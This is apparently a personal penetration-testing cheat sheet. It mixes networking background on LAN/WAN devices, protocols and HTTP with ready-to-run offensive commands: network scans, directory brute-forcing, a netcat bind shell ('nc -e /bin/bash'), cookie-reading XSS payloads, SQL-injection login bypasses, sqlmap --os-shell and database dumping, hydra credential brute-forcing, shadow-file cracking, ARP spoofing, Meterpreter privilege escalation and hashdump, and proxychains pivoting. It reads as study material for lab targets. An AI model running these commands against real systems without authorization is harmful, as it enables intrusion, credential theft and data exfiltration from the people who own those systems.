#SCANING
#Types-SCANING
#1-Active Reconnaissance
In this process, you will directly interact with the computer system to gain information. This information can be relevant and accurate. But there is a risk of getting detected if you are planning active reconnaissance without permission. If you are detected, then system admin can take severe action against you and trail your subsequent activities.
#2-Passive Reconnaissance
In this process, you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems
#whois

whois site.com

#Ping Sweep

fping -a -g 10.10.10.0/24 2>/dev/null nmap -sn 10.10.10.0/24

#Nmap Scans
nmap -sn -iL hostlist.txt
nmap -Pn -o <target>
nmap -sS -sV -sC -O 192.168.8.1/24 or 192.168.8.1
nmap -sT -sS -sV <target>
nmap -p 21.22 or nmap -p-
#OS Detection

nmap -Pn -O 10.10.10.10

#Nmap Scan (Quick)

nmap -sC -sV 10.10.10.10

#Nmap Search Vuln for target
                                                                     
nmap --script nmap-vulners,vulscan -sV
nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV 

#Nmap Scan (Full)

nmap -sC -sV -p- 10.10.10.10

#Nmap Scan (UDP Quick)

nmap -sU -sV 10.10.10.10
#Masscan
masscan -p22,80,23,445 -Pn --rate=800 --banners IP or IP/24 --echo > filename.txt
#Vulnerability-Assessment 
#Nessus
Install Nessus 
or
openvas
or nmap script
#Network
#LAN
#LAN-Devices
A repeater is a physical layer device used to interconnect the media segments of an extended network. A repeater essentially enables a series of cable segments to be treated as a single cable. Repeaters receive signals from one network segment and amplify, retime, and retransmit those signals to another network segment. These actions prevent signal deterioration caused by long cable lengths and large numbers of connected devices. Repeaters are incapable of performing complex filtering and other traffic processing. In addition, all electrical signals, including electrical disturbances and other errors, are repeated and amplified. The total number of repeaters and network segments that can be connected is limited due to timing and other issues.
A hub is a physical-layer device that connects multiple user stations, each via a dedicated cable. Electrical interconnections are established inside the hub. Hubs are used to create a physical star network while maintaining the logical bus or ring configuration of the LAN. In some respects, a hub functions as a multiport repeater.
A LAN extender is a remote-access multilayer switch that connects to a host router. LAN extenders forward traffic from all the standard network-layer protocols (such as IP, IPX, and AppleTalk), and filter traffic based on the MAC address or network-layer protocol type. LAN extenders scale well because the host router filters out unwanted broadcasts and multicasts. LAN extenders, however, are not capable of segmenting traffic or creating security firewalls.
Bridges analyze incoming frames, make forwarding decisions based on information contained in the frames, and forward the frames toward the destination. In some cases, such as source-route bridging, the entire path to the destination is contained in each frame. In other cases, such as transparent bridging, frames are forwarded one hop at a time toward the destination.
Switches are data link layer devices that, like bridges, enable multiple physical LAN segments to be interconnected into a single larger network. Similar to bridges, switches forward and flood traffic based on MAC addresses. Because switching is performed in hardware instead of in software, however, it is significantly faster. Switches use either store-and-forward switching or cut-through switching when forwarding traffic. Many types of switches exist, including ATM switches, LAN switches, and various types of WAN switches.
Routers perform two basic activities: determining optimal routing paths and transporting information groups (typically called packets) through an internetwork. In the context of the routing process, the latter of these is referred to as switching. Although switching is relatively straightforward, path determination can be very complex
#LAN-Protocols
LAN protocols are distinguished by their capability to efficiently deliver data over shorter distances, such as a few hundred feet, through various mediums, such as copper cabling. Different protocols exist for different purposes and exist in different "layers" of the "Open Systems Interconnect," or OSI, model. Typically when using the word "LAN" to describe a protocol, the intent is to describe lower level, or physical, layers. Some of the most common LAN protocols are "Ethernet," "Token Ring" and "Fiber Distributed Data Interface," or "FDDI."
Video of the Day
Ethernet" is by far the most common type of LAN protocol. It is found in homes and offices throughout the world and is recognizable by its common "CAT5" copper cable medium. It uses a switch or hub to which all systems connect to exchange data.
Token Ring" is an older LAN technology that is not prevalent anymore. The basic premise of "Token Ring" is a single "token" is passed from system to system, or through a hub, and only the intended recipient reads the token.FDDI" 
defines how LAN traffic is transmitted over fiber cabling. Fiber cabling is used when longer distances, usually between floors or buildings, are required, or where heightened security is required.
#Wireless LAN Protocols
Wireless LANs, sometimes referred to as "WLAN" or "Wi-Fi," are becoming increasingly prevalent. They operate essentially the same as a traditional LAN, but use wireless signals between antennas as the medium, rather than cabling. Most of the wireless protocols in use today are based on the 802.11 standard and are differentiated by the letter appearing after the number. The four main protocols are "802.11a," "802.11b," "802.11g" and "802.11n."
802.11a" is designed to carry data over shorter distances at higher speeds of up to 54 megabits per second, or Mbps. "802.11b" does the opposite, operating at lower speeds of up to only 11 Mbps but with higher reliability at longer distances and with more obstructing objects in the environment.
802.11g" combines the best of the previous two protocols, operating at up to 54 Mbps over longer distances. "802.11n" is the latest wireless protocol to be released. It can operate at speeds of greater than 150 Mbps over longer distances than the other protocols
#WAN
#WAN-Devcies
There are specially designed network devices that are used to interconnect LANs. Configuring, installing and maintenance of this devices requires expert skills by skilled technicians for the management of the organization’s network. These devices are specific to WAN environment, and they are:
ModemsModems enables digital data to be sent over an analog medium during transmission and receiving of informationA voice band modem converts the digital signals produced by a computer – the 1s and 0s- into voice frequencies that can be transmitted over the analog lines of the telephone network. On the other side of the connection, another modem converts the sounds back into a digital signal for input to a computer or network connectionCSU/DSUChannel Service Unit / Data Service Unit CSU/DSU are combined piece of equipment used for monitoring clocking and frame synchronization on a line. It also performs error detection at the physical layer, It could be called a Modem sort of.
Access serverConcentrates dial-in and dial-out user communications. An access server may have a mixture of analog and digital interfaces and support hundreds of simultaneous users.
WAN SwitchA multi-port internetworking device used in carrier networks. These devices typically switch traffic such as ATM, and operate at the Data Link layer of the OSI reference model. Public switched telephone network switches may also be used within the cloud for circuit-switched connections like Integrated Services Digital Network (ISDN) or analog dial-up.RouterA Router Provides internetworking between the LANs, and WAN access interface ports that are used to connect to the service provider network. These interfaces may be serial connections or other WAN interfaces. With some types of WAN interfaces, an external device such as a DSU/CSU or modem (Analogue, Cable, or DSL) is required to connect the router to the local point of presence (POP) of the service provider.
Core RouterA router that resides within the middle or backbone of the WAN rather than at its periphery. To fulfill this role, a router must be able to support multiple telecommunications interfaces of the highest speed in use in the WAN core, and it must have the ability to forward IP packets at full speed on all of those interfaces. The router must also support the routing protocols being used in the coreCabling Network DevicesHow to Cable LANs and WANs
#WAN-Protocols
WAN protocols are distinguished by their capability to efficiently deliver data over longer distances, such as hundreds of miles. This is generally required to bridge data between multiple LANs. The Internet is the world's largest WAN. Routers, modems and other WAN devices are used to transmit the data over various mediums, commonly fiber cabling. Some of the most common WAN protocols in use today are "Frame Relay," "X.25," "Integrated Services Digital Network," or "ISDN," and "Point-to-Point Protocol," or "PPP."
Frame Relay" and "X.25" are similar in that they are both packet-switching technologies for sending data over large distances. "Frame Relay" is newer and faster, whereas "X.25" delivers data more reliably.
PPP" is a protocol that is used to transmit data for other protocols over mediums that they would not normally support, such as sending the "Internet Protocol," or IP, over serial lines.
ISDN" is a method of combining multiple dial-up lines on a public telephone network into a single data stream.

#Web Applications

The following commands could be useful when enumerating and attacking web applications. Again, make sure you understand what each one does rather than blindly throwing them at the machine in question.
#Banner Grabbing

nc -v 10.10.10.10 port HEAD / HTTP/1.0

#OpenSSL for HTTPS services

openssl s_client -connect 10.10.10.10:443 HEAD / HTTP/1.0

#Httprint

httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

#Nikto
nikto for http: nikto -h
nikto for https: nikto -h -ssl

#HTTP
What HTTP=he Hypertext Transfer Protocol (HTTP) is the foundation of the World Wide Web, and is used to load web pages using hypertext links. HTTP is>
what http request=An HTTP request is the way internet communications platforms such as web browsers ask for the information they need to load a websi>
what HTTP method=What’s an HTTP method?An HTTP method, sometimes referred to as an HTTP verb, indicates the action that the HTTP request expects from the queried server. For example, two of the most common HTTP methods are ‘GET’ and ‘POST’; a ‘GET’ request expects information back in return (usually in the form of a website), while a ‘POST’ request typically indicates that the client is submitting information to the web server (such as form information, e.g. a submitted username and password
what HTTP request headers=HTTP headers contain text information stored in key-value pairs, and they are included in every HTTP request (and response, more on that later). These headers communicate core information, such as what browser the client is using what data is being requested.
what HTTP request body=The body of a request is the part that contains the ‘body’ of information the request is transferring. The body of an HTTP request contains any information being submitted to the web server, such as a username and password, or any other data entered into a form.
what HTTP response=An HTTP response is what web clients (often browsers) receive from an Internet server in answer to an HTTP request. These responses communicate valuable information based on what was asked for in the HTTP request
what HTTP response headers=Much like an HTTP request, an HTTP response comes with headers that convey important information such as the language and format of the data being sent in the response body
what HTTP response body=Successful HTTP responses to ‘GET’ requests generally have a body which contains the requested information. In most web requests, this is HTML data which a web browser will translate into a web page

GET, POST, HEAD, PUT, DELETE, OPTIONS

Use the OPTIONS verb to see what other verbs are available


You can use HTTP verbs to upload a php shell. Find the content length, then use PUT to upload the shell. Make sure you include the size of the payload when using the PUT command.

wc -m shell.php x shell.php PUT /shell.php Content-type: text/html Content-length: x

#Directory and File Scanning

My preferred tool at the moment is dirsearch, I find it to to be fast and easy to use. For a more in depth scan, use gobuster and include a large wordlist.

ffuf -w WORD-LIST -u example.com -c -v
dirsearch.py -u http://10.10.10.10 -e  
gobuster -u 10.10.10.10 -w /path/to/wordlist.txt
gobuster dir -u MACHINE_IP -w WORDLIST_PATH
sublist3r -d exmple.com
amass -ip -d example.com
dirb exmple.com  
dirb http://url/ path/for/word/list.txt
dirb http://example.com -u "admin:password"
dirb http://example.com -p proxy "example" http://127.0.0.1:8080
#or 
dirbuster
#NetCat
nc -lvp 4444 or any port
nc -lvp 4444 -e /bin/bash
nc 192.168.8.1 4444
nc 10.10.10.10 80 
#Advanced Google Searches

Not really necessary, but useful to know all the same.

site: intitle: inurl: filetype: AND, OR, &, |, -

#Cross Site Scripting (XSS)

The general steps I use to find and test XSS are as follows:

1. Find a reflection point 2. Test with <i> tag 3. Test with HTML/JavaScript code (alert('XSS'))

#Reflected XSS = Payload is carried inside the request the victim sends to the website. Typically the link contains the malicious payload
http://victim.site/search.php?find=<payload>
#############################################
<script>alert(document.cookie)</script>
#############################################
<script>alert(‘I am Vulnerable’)</script>
#############################################
<script>alert('XSS')</script>
#############################################
#Persistent XSS = Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post
#DOM-based XSS = where the vulnerability is in the client-side code rather than the server-side code
the bast tool For Scan Web XSS
#xsser
xsser --gtk
#Sql-Injection
#what=SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database
###########################################
#Types-SqlInjection
###########################################
#In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results
#Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead
#Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response
#Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server
#Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result
#Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE
#Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results
#####################End####################
#Locate Sql Injection
the url az not vuln
http://www.example.com/section.php?id=51
put add to and url '
http://www.example.com/section.php?id=51'
#We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.#
and go to login page copy the code past to login page
' or 1=1;--
admin' or '1'='1'--
#
Tool For Hacking Sqli
#SQLMap
#Scan with Sqlmap
sqlmap -u "http://www.example.com/section.php?id=51"
#
sqlmap.py -u "http://example.com/page.php?id=5" --random-agent
sqlmap -u http://10.10.10.10 -p parameter s
sqlmap -u http://10.10.10.10  --data POSTstring -p parameter 
sqlmap -u http://10.10.10.10 --os-shell 
sqlmap -u http://10.10.10.10 --dump
sqlmap -u http://10.10.10.10 --dbs 
sqlmap -u http://10.10.10.10 -D name database --tables
sqlmap -u http://10.10.10.10 -D name database -T table name --columns
sqlmap -u http://10.10.10.10 -D name database -T table name -C columns name
sqlmap -u http://10.10.10.10 -D name database -T table name -C columns name --dump
#System Attacks

The other type of ‘attack’ you will be doing are system attacks. Make sure you understand why/how to brute force types of services and hashes, as well as basic metasploit usage.

#Password Attacks
#John the 
#Unshadow
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
john -wordlist=(wordlist) (filecrack)
john shadow --wordlist 
#Network Attacks
what tcp/ip=TCP/IP stands for Transmission Control Protocol/Internet Protocol, which is a set of networking protocols that allows two or more computers to communicate. The Defense Data Network, part of the Department of Defense, developed TCP/IP, and it has been widely adopted as a networking standard
#Brute Forcing with Hydra
replace ‘ssh’ with any relevant service

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22 
hydra -L users.txt -P pass.txt telnet://10.10.10.10
hydra -U rdp or ftp or telnet or ssh all service
hydra -L user.txt -P pass.txt telnet://192.168.8.1
hydra  -l user -p pass telnet://192.168.8.1
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
#Windows Shares Using Null sessions

nmblookup -A 
smbclient -L //IP -N
smbclient //IP/C$ -N
enum -s IP
smbmap -H 
enum -p IP
--script=nfs-ls,nfs-statfs,nfs-showmount
--script=smb-brute
--script=smb-enum-shares.nse,smb-enum-users.nse
#Enum4Linux
enum4linux -a 
enum4linux -a -v
enum4linux -n 
enum4linux -P
enum4linux -S
enum4linux -s /usr/share/enum4linux/share-list.txt
the bast option is -a
#Impacket tool
samrdump.py IP

#ARP spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward 
arpspoof -i wlan0 -t (target ip) -r (router ip)
open wireshark
#Metasploit

Metasploit is a very useful tool for penetration testers, and I’d recommend going through a Metasploitable for an effective, hands on way to learn about Metasploit.

Basic Metasploit Commands

search x use x info show options, show advanced options SET X (e.g. set RHOST 10.10.10.10, set payload x)

#Meterpreter

The below are some handy commands for use with a Meterpreter session. Again, I’d recommend going through a Metasploitable or doing some extra study here.

background sessions -l sessions -i 1 sysinfo, ifconfig,run metsvc route, getuid getsystem (privesc) bypassuac download x /root/ upload x C:\\Windows shell use post/windows/gather/hashdump
#POST-EXPLOITION
#Privilege-Escalation
#enumeration-tools
meterpreter > run post/multi/recon/local_exploit_suggester
show tools for root 
find / -perm -u=s -type f 2>/dev/null
automatic enumeration-tools
https://github.com/rebootuser/LinEnum
for Linux and Windows
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
#ENUM-Windows
##############
SYSTEM-ENUM
##############
systeminfo 
hostname
wmic qfe
##############
USER-ENUM
##############
whoami
whoami /priv
whoami /groups
##############
NETWORK-ENUM
##############
ipconfig
arp -a
netstat -ano
##############
#Pivoting
Pivoting is a technique that Metasploit uses to route the traffic from a hacked computer toward other networks that are not accessible by a hacker machine
#How
ipcofnig or netstat -anu or route list or arp
run arp_scanner 192.168.8.0/24
run post/multi/gather/ping_sweep rhosts=192.168.8.0/24
run autoroute -s 192.168.8.0/24
run autoroute -p
use auxiliary/scanner/portscan/tcp
(auxiliary/scanner/portscan/tcp) > set rhosts 192.168.8.0/24
(auxiliary/scanner/portscan/tcp) > set threads 10
(auxiliary/scanner/portscan/tcp) > use auxiliary/server/socks4a
(auxiliary/server/socks4a) > set srvhost 127.0.0.1
(auxiliary/server/socks4a) > run
#now go to file /etc/proxychains.conf
down
add socks4 127.0.0.1 1080
#End
proxychains nmap -sV target router/24

